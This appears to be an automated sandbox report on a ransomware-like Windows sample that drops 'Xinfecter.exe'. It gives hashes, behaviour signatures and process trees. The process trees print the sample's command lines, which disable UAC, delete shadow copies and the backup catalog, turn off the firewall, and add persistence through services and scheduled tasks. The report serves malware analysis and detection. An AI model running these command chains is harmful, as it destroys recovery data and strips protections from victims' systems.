Analysis
  max time kernel: 178s
  max time network: 178s
  platform: windows10-2004_x64
  resource: win10v2004-20221111-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 10-02-2023 08:40

Static task: static1
Behavioral task: behavioral1
  Sample: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  Resource: win10v2004-20221111-en
General
  Target: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  Size: 1.2MB
  MD5: e07ee232400dafd802235b90e0e7e056
  SHA1: 49ab07c411e63e8ad305b58489c69fded1f2db13
  SHA256: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08
  SHA512: 6607ba5bf390666bf7d3487984c3241783a5137fa2f3af3bc8173a7a1520d1fe5456512cb6eecd613b5ccb30d5f0a41df9987886d1818269068f6fd27958ac41
  SSDEEP: 24576:Kwh7cD9+IBdH0oIX68Ta7fGXbt8RRnUtX642Rg0ybdDHSF1dRiDHBT2c+T:H7cDUIBdH0Pe7FnUtXh0wSVRi7BT2c+T
Malware Config
Signatures
Processes:
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.

Creates new service(s) 1 TTPs

Modifies Windows Firewall 1 TTPs 3 IoCs
Processes:
  pid | process
  4208 | netsh.exe
  4404 | netsh.exe
  4500 | netsh.exe
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation | cmd.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation | WScript.exe
Drops startup file 2 IoCs
Processes:
  description | ioc | process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
  description | ioc | process
  File opened (read-only) | \??\W: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\G: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\K: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\O: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\P: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\R: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\V: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\B: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\Z: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\Y: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\A: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\J: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\S: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\T: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\U: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\X: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\N: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\Q: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\E: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\F: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\H: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\I: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\L: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened (read-only) | \??\M: | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow | ioc
  28 | api.ipify.org
Drops file in Windows directory 2 IoCs
Processes:
  description | ioc | process
  File created | C:\Windows\SysMain.sys | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  File opened for modification | C:\Windows\SysMain.sys | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
Launches sc.exe 3 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
  pid | process
  400 | sc.exe
  4456 | sc.exe
  816 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.

Delays execution with timeout.exe 8 IoCs
Processes:
  pid | process
  3180 | timeout.exe
  3736 | timeout.exe
  1340 | timeout.exe
  4516 | timeout.exe
  4708 | timeout.exe
  3472 | timeout.exe
  208 | timeout.exe
  4188 | timeout.exe
Enumerates processes with tasklist 1 TTPs 9 IoCs
Processes:
  pid | process
  1004 | tasklist.exe
  2880 | tasklist.exe
  2456 | tasklist.exe
  3404 | tasklist.exe
  2068 | tasklist.exe
  1656 | tasklist.exe
  2936 | tasklist.exe
  2216 | tasklist.exe
  3576 | tasklist.exe
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
Processes:
  pid | process
  1552 | systeminfo.exe
  2824 | systeminfo.exe
Modifies registry class 1 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings | cmd.exe

Modifies registry key 1 TTPs 1 IoCs
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
  pid | process
  1004 | tasklist.exe
  1004 | tasklist.exe
  2880 | tasklist.exe
  2880 | tasklist.exe
Suspicious use of AdjustPrivilegeToken 54 IoCs
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 1004 | tasklist.exe
  Token: SeDebugPrivilege | 2880 | tasklist.exe
  Token: SeDebugPrivilege | 2456 | tasklist.exe
  Token: SeDebugPrivilege | 1656 | tasklist.exe
  Token: SeDebugPrivilege | 3404 | tasklist.exe
  Token: SeIncreaseQuotaPrivilege | 780 | WMIC.exe
  Token: SeSecurityPrivilege | 780 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 780 | WMIC.exe
  Token: SeLoadDriverPrivilege | 780 | WMIC.exe
  Token: SeSystemProfilePrivilege | 780 | WMIC.exe
  Token: SeSystemtimePrivilege | 780 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 780 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 780 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 780 | WMIC.exe
  Token: SeBackupPrivilege | 780 | WMIC.exe
  Token: SeRestorePrivilege | 780 | WMIC.exe
  Token: SeShutdownPrivilege | 780 | WMIC.exe
  Token: SeDebugPrivilege | 780 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 780 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 780 | WMIC.exe
  Token: SeUndockPrivilege | 780 | WMIC.exe
  Token: SeManageVolumePrivilege | 780 | WMIC.exe
  Token: 33 | 780 | WMIC.exe
  Token: 34 | 780 | WMIC.exe
  Token: 35 | 780 | WMIC.exe
  Token: 36 | 780 | WMIC.exe
  Token: SeIncreaseQuotaPrivilege | 780 | WMIC.exe
  Token: SeSecurityPrivilege | 780 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 780 | WMIC.exe
  Token: SeLoadDriverPrivilege | 780 | WMIC.exe
  Token: SeSystemProfilePrivilege | 780 | WMIC.exe
  Token: SeSystemtimePrivilege | 780 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 780 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 780 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 780 | WMIC.exe
  Token: SeBackupPrivilege | 780 | WMIC.exe
  Token: SeRestorePrivilege | 780 | WMIC.exe
  Token: SeShutdownPrivilege | 780 | WMIC.exe
  Token: SeDebugPrivilege | 780 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 780 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 780 | WMIC.exe
  Token: SeUndockPrivilege | 780 | WMIC.exe
  Token: SeManageVolumePrivilege | 780 | WMIC.exe
  Token: 33 | 780 | WMIC.exe
  Token: 34 | 780 | WMIC.exe
  Token: 35 | 780 | WMIC.exe
  Token: 36 | 780 | WMIC.exe
  Token: SeBackupPrivilege | 4036 | vssvc.exe
  Token: SeRestorePrivilege | 4036 | vssvc.exe
  Token: SeAuditPrivilege | 4036 | vssvc.exe
  Token: SeDebugPrivilege | 2068 | tasklist.exe
  Token: SeDebugPrivilege | 2936 | tasklist.exe
  Token: SeDebugPrivilege | 2216 | tasklist.exe
  Token: SeDebugPrivilege | 3576 | tasklist.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  description | pid | process | target process
  PID 3744 wrote to memory of 1396 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 1396 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 1396 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 1396 wrote to memory of 1004 | 1396 | cmd.exe | tasklist.exe
  PID 1396 wrote to memory of 1004 | 1396 | cmd.exe | tasklist.exe
  PID 1396 wrote to memory of 1004 | 1396 | cmd.exe | tasklist.exe
  PID 1396 wrote to memory of 648 | 1396 | cmd.exe | findstr.exe
  PID 1396 wrote to memory of 648 | 1396 | cmd.exe | findstr.exe
  PID 1396 wrote to memory of 648 | 1396 | cmd.exe | findstr.exe
  PID 3744 wrote to memory of 212 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 212 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 212 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 212 wrote to memory of 816 | 212 | cmd.exe | sc.exe
  PID 212 wrote to memory of 816 | 212 | cmd.exe | sc.exe
  PID 212 wrote to memory of 816 | 212 | cmd.exe | sc.exe
  PID 3744 wrote to memory of 3648 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 3648 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 3648 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3648 wrote to memory of 400 | 3648 | cmd.exe | sc.exe
  PID 3648 wrote to memory of 400 | 3648 | cmd.exe | sc.exe
  PID 3648 wrote to memory of 400 | 3648 | cmd.exe | sc.exe
  PID 3744 wrote to memory of 1892 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 1892 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 1892 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 1892 wrote to memory of 4456 | 1892 | cmd.exe | sc.exe
  PID 1892 wrote to memory of 4456 | 1892 | cmd.exe | sc.exe
  PID 1892 wrote to memory of 4456 | 1892 | cmd.exe | sc.exe
  PID 3744 wrote to memory of 4204 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 4204 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 4204 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 4248 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 4248 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 4248 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 4248 wrote to memory of 3236 | 4248 | cmd.exe | WScript.exe
  PID 4248 wrote to memory of 3236 | 4248 | cmd.exe | WScript.exe
  PID 4248 wrote to memory of 3236 | 4248 | cmd.exe | WScript.exe
  PID 3744 wrote to memory of 1372 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 1372 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 1372 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 1372 wrote to memory of 4392 | 1372 | cmd.exe | schtasks.exe
  PID 1372 wrote to memory of 4392 | 1372 | cmd.exe | schtasks.exe
  PID 1372 wrote to memory of 4392 | 1372 | cmd.exe | schtasks.exe
  PID 3236 wrote to memory of 3572 | 3236 | WScript.exe | cmd.exe
  PID 3236 wrote to memory of 3572 | 3236 | WScript.exe | cmd.exe
  PID 3236 wrote to memory of 3572 | 3236 | WScript.exe | cmd.exe
  PID 3236 wrote to memory of 4368 | 3236 | WScript.exe | cmd.exe
  PID 3236 wrote to memory of 4368 | 3236 | WScript.exe | cmd.exe
  PID 3236 wrote to memory of 4368 | 3236 | WScript.exe | cmd.exe
  PID 4368 wrote to memory of 2880 | 4368 | cmd.exe | tasklist.exe
  PID 4368 wrote to memory of 2880 | 4368 | cmd.exe | tasklist.exe
  PID 4368 wrote to memory of 2880 | 4368 | cmd.exe | tasklist.exe
  PID 4368 wrote to memory of 3448 | 4368 | cmd.exe | find.exe
  PID 4368 wrote to memory of 3448 | 4368 | cmd.exe | find.exe
  PID 4368 wrote to memory of 3448 | 4368 | cmd.exe | find.exe
  PID 3744 wrote to memory of 4784 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 4784 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 4784 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 3784 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 3784 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3744 wrote to memory of 3784 | 3744 | 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe | cmd.exe
  PID 3784 wrote to memory of 1552 | 3784 | cmd.exe | systeminfo.exe
  PID 3784 wrote to memory of 1552 | 3784 | cmd.exe | systeminfo.exe
  PID 3784 wrote to memory of 1552 | 3784 | cmd.exe | systeminfo.exe
  PID 3784 wrote to memory of 1300 | 3784 | cmd.exe | find.exe
Processes (indented by process-tree depth; each entry gives the image path, then the command line, then the signatures hit)

  C:\Users\Admin\AppData\Local\Temp\6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"
  - Drops startup file
  - Enumerates connected drives
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
    - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\tasklist.exe
      cmdline: tasklist /v /fo csv
      - Enumerates processes with tasklist
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\findstr.exe
      cmdline: findstr /i "dcdcf"

    C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
    - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\sc.exe
      cmdline: sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
      - Launches sc.exe

    C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
    - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\sc.exe
      cmdline: sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      - Launches sc.exe

    C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\Admin\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
    - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\sc.exe
      cmdline: sc create SqlBakup binPath= "C:\Documents and Settings\Admin\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      - Launches sc.exe

    C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c ver

    C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\WScript.exe
      cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\S-8459.vbs"
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\S-6748.bat

        C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\S-6748.bat" "
        - Suspicious use of WriteProcessMemory

          C:\Windows\SysWOW64\tasklist.exe
          cmdline: tasklist /v
          - Enumerates processes with tasklist
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

          C:\Windows\SysWOW64\find.exe
          cmdline: find /I /c "dcdcf"

          C:\Windows\SysWOW64\timeout.exe
          cmdline: timeout /t 15 /nobreak
          - Delays execution with timeout.exe

          C:\Windows\SysWOW64\tasklist.exe
          cmdline: tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

          C:\Windows\SysWOW64\find.exe
          cmdline: find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"

          C:\Windows\SysWOW64\timeout.exe
          cmdline: timeout /t 15 /nobreak
          - Delays execution with timeout.exe

          C:\Windows\SysWOW64\tasklist.exe
          cmdline: tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

          C:\Windows\SysWOW64\find.exe
          cmdline: find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"

          C:\Windows\SysWOW64\timeout.exe
          cmdline: timeout /t 15 /nobreak
          - Delays execution with timeout.exe

          C:\Windows\SysWOW64\tasklist.exe
          cmdline: tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

          C:\Windows\SysWOW64\find.exe
          cmdline: find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"

          C:\Windows\SysWOW64\timeout.exe
          cmdline: timeout /t 15 /nobreak
          - Delays execution with timeout.exe

          C:\Windows\SysWOW64\tasklist.exe
          cmdline: tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

          C:\Windows\SysWOW64\find.exe
          cmdline: find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"

          C:\Windows\SysWOW64\timeout.exe
          cmdline: timeout /t 15 /nobreak
          - Delays execution with timeout.exe

          C:\Windows\SysWOW64\tasklist.exe
          cmdline: tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

          C:\Windows\SysWOW64\find.exe
          cmdline: find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"

          C:\Windows\SysWOW64\timeout.exe
          cmdline: timeout /t 15 /nobreak
          - Delays execution with timeout.exe

          C:\Windows\SysWOW64\tasklist.exe
          cmdline: tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

          C:\Windows\SysWOW64\find.exe
          cmdline: find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"

          C:\Windows\SysWOW64\timeout.exe
          cmdline: timeout /t 15 /nobreak
          - Delays execution with timeout.exe

          C:\Windows\SysWOW64\tasklist.exe
          cmdline: tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

          C:\Windows\SysWOW64\find.exe
          cmdline: find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"

          C:\Windows\SysWOW64\timeout.exe
          cmdline: timeout /t 15 /nobreak
          - Delays execution with timeout.exe

    C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
    - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\schtasks.exe
      cmdline: schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\S-2153.bat'" /f
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c echo %date%-%time%

    C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
    - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\systeminfo.exe
      cmdline: systeminfo
      - Gathers system information

      C:\Windows\SysWOW64\find.exe
      cmdline: find /i "os name"

    C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"

      C:\Windows\SysWOW64\systeminfo.exe
      cmdline: systeminfo
      - Gathers system information

      C:\Windows\SysWOW64\find.exe
      cmdline: find /i "original"

    C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c ver

    C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet

      C:\Windows\SysWOW64\reg.exe
      cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      - UAC bypass
      - Modifies registry key

      C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic shadowcopy delete
      - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\netsh.exe
      cmdline: netsh advfirewall set currentprofile state off
      - Modifies Windows Firewall

      C:\Windows\SysWOW64\netsh.exe
      cmdline: netsh firewall set opmode mode=disable
      - Modifies Windows Firewall

      C:\Windows\SysWOW64\netsh.exe
      cmdline: netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
      - Modifies Windows Firewall

  C:\Windows\system32\vssvc.exe
  cmdline: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\S-2153.bat
  Filesize: 138B
  MD5: 82a528cbf39b8ea7e2982e7b2305204c
  SHA1: 717836e0e2b304ed7ae239cc1db0f6f80e0419b1
  SHA256: 616738526c38e04f992b7b9fc60cb7feb3ee416bf47b69aa2c3a5f1a722a653b
  SHA512: eff7654e171dbd9bc471718a7e14ee3c84a9edf948f4c8863c8107e653be8ba06bc7a2876d506d6e4ae7ef2280e820d04615ebcd88894ef01b3667d070241db3

C:\Users\Admin\AppData\S-6748.bat
  Filesize: 2KB
  MD5: 3dba4c2dba3286a09d0b8ee61569f602
  SHA1: 4fb2a73854fad23f26d08c76fdda4e2268ea5f9e
  SHA256: 89d549b2862e20141b0b25ed7165a00e27ed865c6fb78be56393b8395465f5c7
  SHA512: 054c3c7ff25534a4b24f03ec62aa38c0f8352948d350f008f1b7beb3c72ea3c495fcb8c3194d9bfc3fffc363c2bca5c05d520942c063d450127c188afc2ba0d0

C:\Users\Admin\AppData\S-8459.vbs
  Filesize: 686B
  MD5: ed7a274ff8ac640416952bfb5d6c927a
  SHA1: 6b33cd5b39db6e9a900336e446f64a137f0a0f42
  SHA256: 4d68e4a7a437eb4a7ad9c7b28bdda894a68ae41efba8a5e4d3a6a930bebfeea5
  SHA512: 8f3a4f071550afe716c5d39601cf1e8559084fbb701e95b28eb7685fed6d8a972e662ad19124a2242fd30c291b8dd1f18f1a2dcf56ac6c98f2bf96bac91510f3
Memory dumps (one per process):
  memory/208-188-0x0000000000000000-mapping.dmp
  memory/212-135-0x0000000000000000-mapping.dmp
  memory/396-158-0x0000000000000000-mapping.dmp
  memory/400-138-0x0000000000000000-mapping.dmp
  memory/648-134-0x0000000000000000-mapping.dmp
  memory/780-173-0x0000000000000000-mapping.dmp
  memory/816-136-0x0000000000000000-mapping.dmp
  memory/1004-133-0x0000000000000000-mapping.dmp
  memory/1092-187-0x0000000000000000-mapping.dmp
  memory/1224-184-0x0000000000000000-mapping.dmp
  memory/1300-156-0x0000000000000000-mapping.dmp
  memory/1340-170-0x0000000000000000-mapping.dmp
  memory/1372-146-0x0000000000000000-mapping.dmp
  memory/1396-132-0x0000000000000000-mapping.dmp
  memory/1552-155-0x0000000000000000-mapping.dmp
  memory/1656-165-0x0000000000000000-mapping.dmp
  memory/1856-181-0x0000000000000000-mapping.dmp
  memory/1892-139-0x0000000000000000-mapping.dmp
  memory/2024-163-0x0000000000000000-mapping.dmp
  memory/2068-175-0x0000000000000000-mapping.dmp
  memory/2216-183-0x0000000000000000-mapping.dmp
  memory/2456-162-0x0000000000000000-mapping.dmp
  memory/2824-159-0x0000000000000000-mapping.dmp
